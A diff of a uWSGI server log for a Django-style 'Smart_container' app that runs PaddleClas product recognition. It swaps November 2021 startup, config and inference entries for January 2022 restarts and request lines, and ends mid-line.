07:45:23 INFO: ToCHWImage : None -E1102 07:45:23.001497 18705 analysis_config.cc:81] Please compile with gpu to EnableGpu() ---- Fused 0 subgraphs into layer_norm op. - 0%| | 0/357 [00:00 generated 18 bytes in 315 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) -[pid: 29932|app: 0|req: 1/2] 210.51.42.187 () {36 vars in 631 bytes} [Tue Nov 2 23:41:26 2021] GET /favicon.ico => generated 179 bytes in 244 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 29932|app: 0|req: 2/3] 106.12.223.201 () {36 vars in 488 bytes} [Tue Nov 2 23:47:36 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 29931|app: 0|req: 1/4] 106.12.223.201 () {36 vars in 488 bytes} [Tue Nov 2 23:47:36 2021] GET / => generated 179 bytes in 266 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 29932|app: 0|req: 3/5] 106.12.223.201 () {36 vars in 488 bytes} [Wed Nov 3 00:03:59 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 29931|app: 0|req: 2/6] 106.12.223.201 () {36 vars in 488 bytes} [Wed Nov 3 00:04:13 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 29932|app: 0|req: 4/7] 106.12.223.204 () {36 vars in 488 bytes} [Wed Nov 3 00:14:13 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 29931|app: 0|req: 3/8] 106.12.223.202 () {36 vars in 488 bytes} [Wed Nov 3 00:14:15 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 29932|app: 0|req: 5/9] 106.12.223.201 () {36 vars in 488 bytes} [Wed Nov 3 00:27:07 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 29931|app: 0|req: 4/10] 106.12.223.201 () {36 vars in 488 bytes} [Wed Nov 3 00:27:09 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 29932|app: 0|req: 6/11] 106.12.223.200 () {36 vars in 488 bytes} [Wed Nov 3 00:40:27 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 29931|app: 0|req: 5/12] 106.12.223.203 () {36 vars in 488 bytes} [Wed Nov 3 00:40:29 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 29932|app: 0|req: 7/13] 106.12.223.202 () {36 vars in 488 bytes} [Wed Nov 3 00:52:25 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 29931|app: 0|req: 6/14] 106.12.223.202 () {36 vars in 488 bytes} [Wed Nov 3 00:52:26 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -*** Starting uWSGI 2.0.20 (64bit) on [Wed Nov 3 09:00:29 2021] *** -compiled with version: 9.3.0 on 30 October 2021 03:03:25 -os: Linux-5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 -nodename: thomas +spawned uWSGI master process (pid: 9015) +spawned uWSGI worker 1 (pid: 9017, cores: 1) +spawned uWSGI worker 2 (pid: 9018, cores: 1) +spawned uWSGI worker 3 (pid: 9019, cores: 1) +spawned uWSGI worker 4 (pid: 9020, cores: 1) +spawned uWSGI worker 5 (pid: 9021, cores: 1) +spawned uWSGI worker 6 (pid: 9022, cores: 1) +spawned uWSGI worker 7 (pid: 9023, cores: 1) +spawned uWSGI worker 8 (pid: 9024, cores: 1) +spawned uWSGI worker 9 (pid: 9025, cores: 1) +spawned uWSGI worker 10 (pid: 9026, cores: 1) +spawned uWSGI http 1 (pid: 9027) +*** Starting uWSGI 2.0.20 (64bit) on [Wed Jan 26 19:54:22 2022] *** +compiled with version: 7.5.0 on 26 January 2022 07:48:28 +os: Linux-4.15.0-166-generic #174-Ubuntu SMP Wed Dec 8 19:07:44 UTC 2021 +nodename: iZuf6i5vgnr6fuc47aapjkZ machine: x86_64 clock source: unix -detected number of CPU cores: 1 +detected number of CPU cores: 2 current working directory: /root/Smart_container/conf/uwsgi +writing pidfile to /root/Smart_container/conf/uwsgi/uwsgi.pid detected binary path: /usr/local/bin/uwsgi !!! no internal routing support, rebuild with pcre support !!! uWSGI running as root, you can use --uid/--gid/--chroot options *** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** chdir() to /root/Smart_container -your processes number limit is 7720 +your processes number limit is 15592 your memory page size is 4096 bytes detected max file descriptor number: 65535 lock engine: pthread robust mutexes thunder lock: disabled (you can enable it with --thunder-lock) -probably another instance of uWSGI is running on the same address (:8001). +uWSGI http bound on :8001 fd 6 +uwsgi socket 0 bound to TCP address 127.0.0.1:8000 fd 9 +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +Python version: 3.6.9 (default, Dec 8 2021, 21:08:43) [GCC 8.4.0] +*** Python threads support is disabled. You can enable it with --enable-threads *** +Python main interpreter initialized at 0x55e85a7ea830 +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +your server socket listen backlog is limited to 100 connections +your mercy for graceful operations on workers is 60 seconds +mapped 801944 bytes (783 KB) for 10 cores +*** Operational MODE: preforking *** +WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x55e85a7ea830 pid: 9105 (default app) +mountpoint already configured. skip. +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +*** uWSGI is running in multiple interpreter mode *** +spawned uWSGI master process (pid: 9105) +spawned uWSGI worker 1 (pid: 9107, cores: 1) +spawned uWSGI worker 2 (pid: 9108, cores: 1) +spawned uWSGI worker 3 (pid: 9109, cores: 1) +spawned uWSGI worker 4 (pid: 9110, cores: 1) +spawned uWSGI worker 5 (pid: 9111, cores: 1) +spawned uWSGI worker 6 (pid: 9112, cores: 1) +spawned uWSGI worker 7 (pid: 9113, cores: 1) +spawned uWSGI worker 8 (pid: 9114, cores: 1) +spawned uWSGI worker 9 (pid: 9115, cores: 1) +spawned uWSGI worker 10 (pid: 9116, cores: 1) +spawned uWSGI http 1 (pid: 9117) +*** Starting uWSGI 2.0.20 (64bit) on [Wed Jan 26 20:17:57 2022] *** +compiled with version: 7.5.0 on 26 January 2022 07:48:28 +os: Linux-4.15.0-166-generic #174-Ubuntu SMP Wed Dec 8 19:07:44 UTC 2021 +nodename: iZuf6i5vgnr6fuc47aapjkZ +machine: x86_64 +clock source: unix +detected number of CPU cores: 2 +current working directory: /root/Smart_container/conf/uwsgi +writing pidfile to /root/Smart_container/conf/uwsgi/uwsgi.pid +detected binary path: /usr/local/bin/uwsgi +!!! no internal routing support, rebuild with pcre support !!! +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +chdir() to /root/Smart_container +your processes number limit is 15592 +your memory page size is 4096 bytes +detected max file descriptor number: 65535 +lock engine: pthread robust mutexes +thunder lock: disabled (you can enable it with --thunder-lock) +uWSGI http bound on :8001 fd 6 +uwsgi socket 0 bound to TCP address 127.0.0.1:8000 fd 9 +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +Python version: 3.6.9 (default, Dec 8 2021, 21:08:43) [GCC 8.4.0] +*** Python threads support is disabled. You can enable it with --enable-threads *** +Python main interpreter initialized at 0x55f413e9e7d0 +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +your server socket listen backlog is limited to 100 connections +your mercy for graceful operations on workers is 60 seconds +mapped 801944 bytes (783 KB) for 10 cores +*** Operational MODE: preforking *** +WSGI app 0 (mountpoint='') ready in 1 seconds on interpreter 0x55f413e9e7d0 pid: 9266 (default app) +mountpoint already configured. skip. +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +*** uWSGI is running in multiple interpreter mode *** +spawned uWSGI master process (pid: 9266) +spawned uWSGI worker 1 (pid: 9268, cores: 1) +spawned uWSGI worker 2 (pid: 9269, cores: 1) +spawned uWSGI worker 3 (pid: 9270, cores: 1) +spawned uWSGI worker 4 (pid: 9271, cores: 1) +spawned uWSGI worker 5 (pid: 9272, cores: 1) +spawned uWSGI worker 6 (pid: 9273, cores: 1) +spawned uWSGI worker 7 (pid: 9274, cores: 1) +spawned uWSGI worker 8 (pid: 9275, cores: 1) +spawned uWSGI worker 9 (pid: 9276, cores: 1) +spawned uWSGI worker 10 (pid: 9277, cores: 1) +spawned uWSGI http 1 (pid: 9278) +*** Starting uWSGI 2.0.20 (64bit) on [Wed Jan 26 20:28:00 2022] *** +compiled with version: 7.5.0 on 26 January 2022 07:48:28 +os: Linux-4.15.0-166-generic #174-Ubuntu SMP Wed Dec 8 19:07:44 UTC 2021 +nodename: iZuf6i5vgnr6fuc47aapjkZ +machine: x86_64 +clock source: unix +detected number of CPU cores: 2 +current working directory: /root/Smart_container/conf/uwsgi +writing pidfile to /root/Smart_container/conf/uwsgi/uwsgi.pid +detected binary path: /usr/local/bin/uwsgi +!!! no internal routing support, rebuild with pcre support !!! +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +chdir() to /root/Smart_container +your processes number limit is 15592 +your memory page size is 4096 bytes +detected max file descriptor number: 65535 +lock engine: pthread robust mutexes +thunder lock: disabled (you can enable it with --thunder-lock) +uWSGI http bound on :8001 fd 6 +probably another instance of uWSGI is running on the same address (127.0.0.1:8000). bind(): Address already in use [core/socket.c line 769] -[pid: 29932|app: 0|req: 8/15] 210.51.42.187 () {38 vars in 711 bytes} [Wed Nov 3 01:00:37 2021] GET /record/ => generated 18 bytes in 1 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) -*** Starting uWSGI 2.0.20 (64bit) on [Wed Nov 3 09:16:45 2021] *** -compiled with version: 9.3.0 on 30 October 2021 03:03:25 -os: Linux-5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 -nodename: thomas +*** Starting uWSGI 2.0.20 (64bit) on [Wed Jan 26 20:37:08 2022] *** +compiled with version: 7.5.0 on 26 January 2022 07:48:28 +os: Linux-4.15.0-166-generic #174-Ubuntu SMP Wed Dec 8 19:07:44 UTC 2021 +nodename: iZuf6i5vgnr6fuc47aapjkZ machine: x86_64 clock source: unix -detected number of CPU cores: 1 +detected number of CPU cores: 2 current working directory: /root/Smart_container/conf/uwsgi +writing pidfile to /root/Smart_container/conf/uwsgi/uwsgi.pid detected binary path: /usr/local/bin/uwsgi !!! no internal routing support, rebuild with pcre support !!! uWSGI running as root, you can use --uid/--gid/--chroot options *** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** chdir() to /root/Smart_container -your processes number limit is 7720 +your processes number limit is 15592 +your memory page size is 4096 bytes +detected max file descriptor number: 65535 +lock engine: pthread robust mutexes +thunder lock: disabled (you can enable it with --thunder-lock) +uWSGI http bound on :8001 fd 6 +probably another instance of uWSGI is running on the same address (127.0.0.1:8000). +bind(): Address already in use [core/socket.c line 769] +*** Starting uWSGI 2.0.20 (64bit) on [Wed Jan 26 20:41:16 2022] *** +compiled with version: 7.5.0 on 26 January 2022 07:48:28 +os: Linux-4.15.0-166-generic #174-Ubuntu SMP Wed Dec 8 19:07:44 UTC 2021 +nodename: iZuf6i5vgnr6fuc47aapjkZ +machine: x86_64 +clock source: unix +detected number of CPU cores: 2 +current working directory: /root/Smart_container/conf/uwsgi +writing pidfile to /root/Smart_container/conf/uwsgi/uwsgi.pid +detected binary path: /usr/local/bin/uwsgi +!!! no internal routing support, rebuild with pcre support !!! +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +chdir() to /root/Smart_container +your processes number limit is 15592 your memory page size is 4096 bytes detected max file descriptor number: 65535 lock engine: pthread robust mutexes @@ -1230,210 +664,47 @@ uWSGI http bound on :8001 fd 6 uwsgi socket 0 bound to TCP address 127.0.0.1:8000 fd 9 uWSGI running as root, you can use --uid/--gid/--chroot options *** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -Python version: 3.8.10 (default, Sep 28 2021, 16:10:42) [GCC 9.3.0] +Python version: 3.6.9 (default, Dec 8 2021, 21:08:43) [GCC 8.4.0] *** Python threads support is disabled. You can enable it with --enable-threads *** -Python main interpreter initialized at 0x563348753d30 +Python main interpreter initialized at 0x55be781517e0 uWSGI running as root, you can use --uid/--gid/--chroot options *** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** your server socket listen backlog is limited to 100 connections your mercy for graceful operations on workers is 60 seconds -mapped 802120 bytes (783 KB) for 10 cores +mapped 801944 bytes (783 KB) for 10 cores *** Operational MODE: preforking *** -WSGI app 0 (mountpoint='') ready in 1 seconds on interpreter 0x563348753d30 pid: 30815 (default app) +WSGI app 0 (mountpoint='') ready in 1 seconds on interpreter 0x55be781517e0 pid: 10115 (default app) +mountpoint already configured. skip. uWSGI running as root, you can use --uid/--gid/--chroot options *** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** *** uWSGI is running in multiple interpreter mode *** -spawned uWSGI master process (pid: 30815) -spawned uWSGI worker 1 (pid: 30817, cores: 1) -spawned uWSGI worker 2 (pid: 30818, cores: 1) -spawned uWSGI worker 3 (pid: 30819, cores: 1) -spawned uWSGI worker 4 (pid: 30820, cores: 1) -spawned uWSGI worker 5 (pid: 30821, cores: 1) -spawned uWSGI worker 6 (pid: 30823, cores: 1) -spawned uWSGI worker 7 (pid: 30824, cores: 1) -spawned uWSGI worker 8 (pid: 30825, cores: 1) -spawned uWSGI worker 9 (pid: 30826, cores: 1) -spawned uWSGI worker 10 (pid: 30827, cores: 1) -spawned uWSGI http 1 (pid: 30828) -req -2021-11-03 01:17:51 INFO: -=========================================================== -== PaddleClas is powered by PaddlePaddle ! == -=========================================================== -== == -== For more info please go to the following website. == -== == -== https://github.com/PaddlePaddle/PaddleClas == -=========================================================== - -2021-11-03 01:17:51 INFO: DetPostProcess : -2021-11-03 01:17:51 INFO: DetPreProcess : -2021-11-03 01:17:51 INFO: transform_ops : -2021-11-03 01:17:51 INFO: DetResize : -2021-11-03 01:17:51 INFO: interp : 2 -2021-11-03 01:17:51 INFO: keep_ratio : False -2021-11-03 01:17:51 INFO: target_size : [640, 640] -2021-11-03 01:17:51 INFO: DetNormalizeImage : -2021-11-03 01:17:51 INFO: is_scale : True -2021-11-03 01:17:51 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 01:17:51 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 01:17:51 INFO: DetPermute : -2021-11-03 01:17:51 INFO: Global : -2021-11-03 01:17:51 INFO: batch_size : 1 -2021-11-03 01:17:51 INFO: cpu_num_threads : 10 -2021-11-03 01:17:51 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 01:17:51 INFO: enable_benchmark : True -2021-11-03 01:17:51 INFO: enable_mkldnn : True -2021-11-03 01:17:51 INFO: enable_profile : False -2021-11-03 01:17:51 INFO: gpu_mem : 8000 -2021-11-03 01:17:51 INFO: image_shape : [3, 640, 640] -2021-11-03 01:17:51 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 01:17:51 INFO: ir_optim : True -2021-11-03 01:17:51 INFO: labe_list : ['foreground'] -2021-11-03 01:17:51 INFO: max_det_results : 5 -2021-11-03 01:17:51 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 01:17:51 INFO: rec_nms_thresold : 0.05 -2021-11-03 01:17:51 INFO: threshold : 0.2 -2021-11-03 01:17:51 INFO: use_fp16 : False -2021-11-03 01:17:51 INFO: use_gpu : False -2021-11-03 01:17:51 INFO: use_tensorrt : False -2021-11-03 01:17:51 INFO: IndexProcess : -2021-11-03 01:17:51 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 01:17:51 INFO: return_k : 5 -2021-11-03 01:17:51 INFO: score_thres : 0.5 -2021-11-03 01:17:51 INFO: RecPostProcess : None -2021-11-03 01:17:51 INFO: RecPreProcess : -2021-11-03 01:17:51 INFO: transform_ops : -2021-11-03 01:17:51 INFO: ResizeImage : -2021-11-03 01:17:51 INFO: size : 224 -2021-11-03 01:17:51 INFO: NormalizeImage : -2021-11-03 01:17:51 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 01:17:51 INFO: order : -2021-11-03 01:17:51 INFO: scale : 0.00392157 -2021-11-03 01:17:51 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 01:17:51 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2372.8153705596924 ms per batch image -[{'bbox': [181, 133, 359, 358], 'rec_docs': '江小白', 'rec_scores': 0.60788506}] -{'bbox': [181, 133, 359, 358], 'rec_docs': '江小白', 'rec_scores': 0.60788506} -234 -["{'bbox': [181, 133, 359, 358], 'rec_docs': '江小白', 'rec_scores': 0.60788506}\n"] -['江小白'] -['江小白', '33'] -[pid: 30826|app: 0|req: 1/1] 210.51.42.176 () {34 vars in 432 bytes} [Wed Nov 3 01:17:50 2021] POST /reference_client/ => generated 114 bytes in 6537 msecs (HTTP/1.1 200) 5 headers in 158 bytes (1 switches on core 0) -[pid: 30827|app: 0|req: 1/2] 210.51.42.187 () {36 vars in 680 bytes} [Wed Nov 3 01:18:31 2021] GET /record/ => generated 18 bytes in 252 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) -req -2021-11-03 01:18:58 INFO: -=========================================================== -== PaddleClas is powered by PaddlePaddle ! == -=========================================================== -== == -== For more info please go to the following website. == -== == -== https://github.com/PaddlePaddle/PaddleClas == -=========================================================== - -2021-11-03 01:18:58 INFO: DetPostProcess : -2021-11-03 01:18:58 INFO: DetPreProcess : -2021-11-03 01:18:58 INFO: transform_ops : -2021-11-03 01:18:58 INFO: DetResize : -2021-11-03 01:18:58 INFO: interp : 2 -2021-11-03 01:18:58 INFO: keep_ratio : False -2021-11-03 01:18:58 INFO: target_size : [640, 640] -2021-11-03 01:18:58 INFO: DetNormalizeImage : -2021-11-03 01:18:58 INFO: is_scale : True -2021-11-03 01:18:58 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 01:18:58 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 01:18:58 INFO: DetPermute : -2021-11-03 01:18:58 INFO: Global : -2021-11-03 01:18:58 INFO: batch_size : 1 -2021-11-03 01:18:58 INFO: cpu_num_threads : 10 -2021-11-03 01:18:58 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 01:18:58 INFO: enable_benchmark : True -2021-11-03 01:18:58 INFO: enable_mkldnn : True -2021-11-03 01:18:58 INFO: enable_profile : False -2021-11-03 01:18:58 INFO: gpu_mem : 8000 -2021-11-03 01:18:58 INFO: image_shape : [3, 640, 640] -2021-11-03 01:18:58 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 01:18:58 INFO: ir_optim : True -2021-11-03 01:18:58 INFO: labe_list : ['foreground'] -2021-11-03 01:18:58 INFO: max_det_results : 5 -2021-11-03 01:18:58 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 01:18:58 INFO: rec_nms_thresold : 0.05 -2021-11-03 01:18:58 INFO: threshold : 0.2 -2021-11-03 01:18:58 INFO: use_fp16 : False -2021-11-03 01:18:58 INFO: use_gpu : False -2021-11-03 01:18:58 INFO: use_tensorrt : False -2021-11-03 01:18:58 INFO: IndexProcess : -2021-11-03 01:18:58 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 01:18:58 INFO: return_k : 5 -2021-11-03 01:18:58 INFO: score_thres : 0.5 -2021-11-03 01:18:58 INFO: RecPostProcess : None -2021-11-03 01:18:58 INFO: RecPreProcess : -2021-11-03 01:18:58 INFO: transform_ops : -2021-11-03 01:18:58 INFO: ResizeImage : -2021-11-03 01:18:58 INFO: size : 224 -2021-11-03 01:18:58 INFO: NormalizeImage : -2021-11-03 01:18:58 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 01:18:58 INFO: order : -2021-11-03 01:18:58 INFO: scale : 0.00392157 -2021-11-03 01:18:58 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 01:18:58 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2478.3780574798584 ms per batch image -[{'bbox': [182, 158, 358, 381], 'rec_docs': '江小白', 'rec_scores': 0.6956786}] -{'bbox': [182, 158, 358, 381], 'rec_docs': '江小白', 'rec_scores': 0.6956786} -234 -["{'bbox': [182, 158, 358, 381], 'rec_docs': '江小白', 'rec_scores': 0.6956786}\n"] -['江小白'] -['江小白', '33'] -[pid: 30826|app: 0|req: 2/3] 210.51.42.176 () {34 vars in 431 bytes} [Wed Nov 3 01:18:57 2021] POST /reference_client/ => generated 114 bytes in 6732 msecs (HTTP/1.1 200) 5 headers in 158 bytes (9 switches on core 0) -[pid: 30827|app: 0|req: 2/4] 106.12.223.201 () {36 vars in 488 bytes} [Wed Nov 3 01:20:12 2021] GET / => generated 179 bytes in 21 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 30826|app: 0|req: 3/5] 106.12.223.200 () {36 vars in 488 bytes} [Wed Nov 3 01:20:13 2021] GET / => generated 179 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -*** Starting uWSGI 2.0.20 (64bit) on [Wed Nov 3 11:43:58 2021] *** -compiled with version: 9.3.0 on 30 October 2021 03:03:25 -os: Linux-5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 -nodename: thomas +spawned uWSGI master process (pid: 10115) +spawned uWSGI worker 1 (pid: 10117, cores: 1) +spawned uWSGI worker 2 (pid: 10118, cores: 1) +spawned uWSGI worker 3 (pid: 10119, cores: 1) +spawned uWSGI worker 4 (pid: 10120, cores: 1) +spawned uWSGI worker 5 (pid: 10121, cores: 1) +spawned uWSGI worker 6 (pid: 10122, cores: 1) +spawned uWSGI worker 7 (pid: 10123, cores: 1) +spawned uWSGI worker 8 (pid: 10124, cores: 1) +spawned uWSGI worker 9 (pid: 10125, cores: 1) +spawned uWSGI worker 10 (pid: 10126, cores: 1) +spawned uWSGI http 1 (pid: 10127) +*** Starting uWSGI 2.0.20 (64bit) on [Wed Jan 26 21:42:08 2022] *** +compiled with version: 7.5.0 on 26 January 2022 07:48:28 +os: Linux-4.15.0-166-generic #174-Ubuntu SMP Wed Dec 8 19:07:44 UTC 2021 +nodename: iZuf6i5vgnr6fuc47aapjkZ machine: x86_64 clock source: unix -detected number of CPU cores: 1 +detected number of CPU cores: 2 current working directory: /root/Smart_container/conf/uwsgi +writing pidfile to /root/Smart_container/conf/uwsgi/uwsgi.pid detected binary path: /usr/local/bin/uwsgi !!! no internal routing support, rebuild with pcre support !!! uWSGI running as root, you can use --uid/--gid/--chroot options *** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** chdir() to /root/Smart_container -your processes number limit is 7720 +your processes number limit is 15592 your memory page size is 4096 bytes detected max file descriptor number: 65535 lock engine: pthread robust mutexes @@ -1442,38 +713,40 @@ uWSGI http bound on :8001 fd 6 uwsgi socket 0 bound to TCP address 127.0.0.1:8000 fd 9 uWSGI running as root, you can use --uid/--gid/--chroot options *** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -Python version: 3.8.10 (default, Sep 28 2021, 16:10:42) [GCC 9.3.0] +Python version: 3.6.9 (default, Dec 8 2021, 21:08:43) [GCC 8.4.0] *** Python threads support is disabled. You can enable it with --enable-threads *** -Python main interpreter initialized at 0x5570734c9d30 +Python main interpreter initialized at 0x5632d8cb17e0 uWSGI running as root, you can use --uid/--gid/--chroot options *** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** your server socket listen backlog is limited to 100 connections your mercy for graceful operations on workers is 60 seconds -mapped 802120 bytes (783 KB) for 10 cores +mapped 801944 bytes (783 KB) for 10 cores *** Operational MODE: preforking *** -WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x5570734c9d30 pid: 32755 (default app) +WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x5632d8cb17e0 pid: 11930 (default app) +mountpoint already configured. skip. uWSGI running as root, you can use --uid/--gid/--chroot options *** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** *** uWSGI is running in multiple interpreter mode *** -spawned uWSGI master process (pid: 32755) -spawned uWSGI worker 1 (pid: 32757, cores: 1) -spawned uWSGI worker 2 (pid: 32758, cores: 1) -spawned uWSGI worker 3 (pid: 32759, cores: 1) -spawned uWSGI worker 4 (pid: 32760, cores: 1) -spawned uWSGI worker 5 (pid: 32761, cores: 1) -spawned uWSGI worker 6 (pid: 32762, cores: 1) -spawned uWSGI worker 7 (pid: 32763, cores: 1) -spawned uWSGI worker 8 (pid: 32764, cores: 1) -spawned uWSGI worker 9 (pid: 32765, cores: 1) -spawned uWSGI worker 10 (pid: 32766, cores: 1) -spawned uWSGI http 1 (pid: 32767) -[pid: 32763|app: 0|req: 1/1] 210.51.42.187 () {40 vars in 737 bytes} [Wed Nov 3 03:44:07 2021] GET /record => generated 0 bytes in 211 msecs (HTTP/1.1 301) 5 headers in 176 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 1/2] 210.51.42.187 () {40 vars in 739 bytes} [Wed Nov 3 03:44:08 2021] GET /record/ => generated 18 bytes in 230 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 1/3] 210.51.42.187 () {36 vars in 680 bytes} [Wed Nov 3 03:44:15 2021] GET /record/ => generated 18 bytes in 214 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 2/4] 106.12.223.201 () {36 vars in 488 bytes} [Wed Nov 3 03:45:32 2021] GET / => generated 179 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 2/5] 106.12.223.201 () {36 vars in 488 bytes} [Wed Nov 3 03:45:34 2021] GET / => generated 179 bytes in 12 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +spawned uWSGI master process (pid: 11930) +spawned uWSGI worker 1 (pid: 11932, cores: 1) +spawned uWSGI worker 2 (pid: 11933, cores: 1) +spawned uWSGI worker 3 (pid: 11934, cores: 1) +spawned uWSGI worker 4 (pid: 11935, cores: 1) +spawned uWSGI worker 5 (pid: 11936, cores: 1) +spawned uWSGI worker 6 (pid: 11937, cores: 1) +spawned uWSGI worker 7 (pid: 11938, cores: 1) +spawned uWSGI worker 8 (pid: 11939, cores: 1) +spawned uWSGI worker 9 (pid: 11940, cores: 1) +spawned uWSGI worker 10 (pid: 11941, cores: 1) +spawned uWSGI http 1 (pid: 11942) +[pid: 11941|app: 0|req: 1/1] 110.248.119.243 () {38 vars in 730 bytes} [Wed Jan 26 13:42:11 2022] GET /record/ => generated 18 bytes in 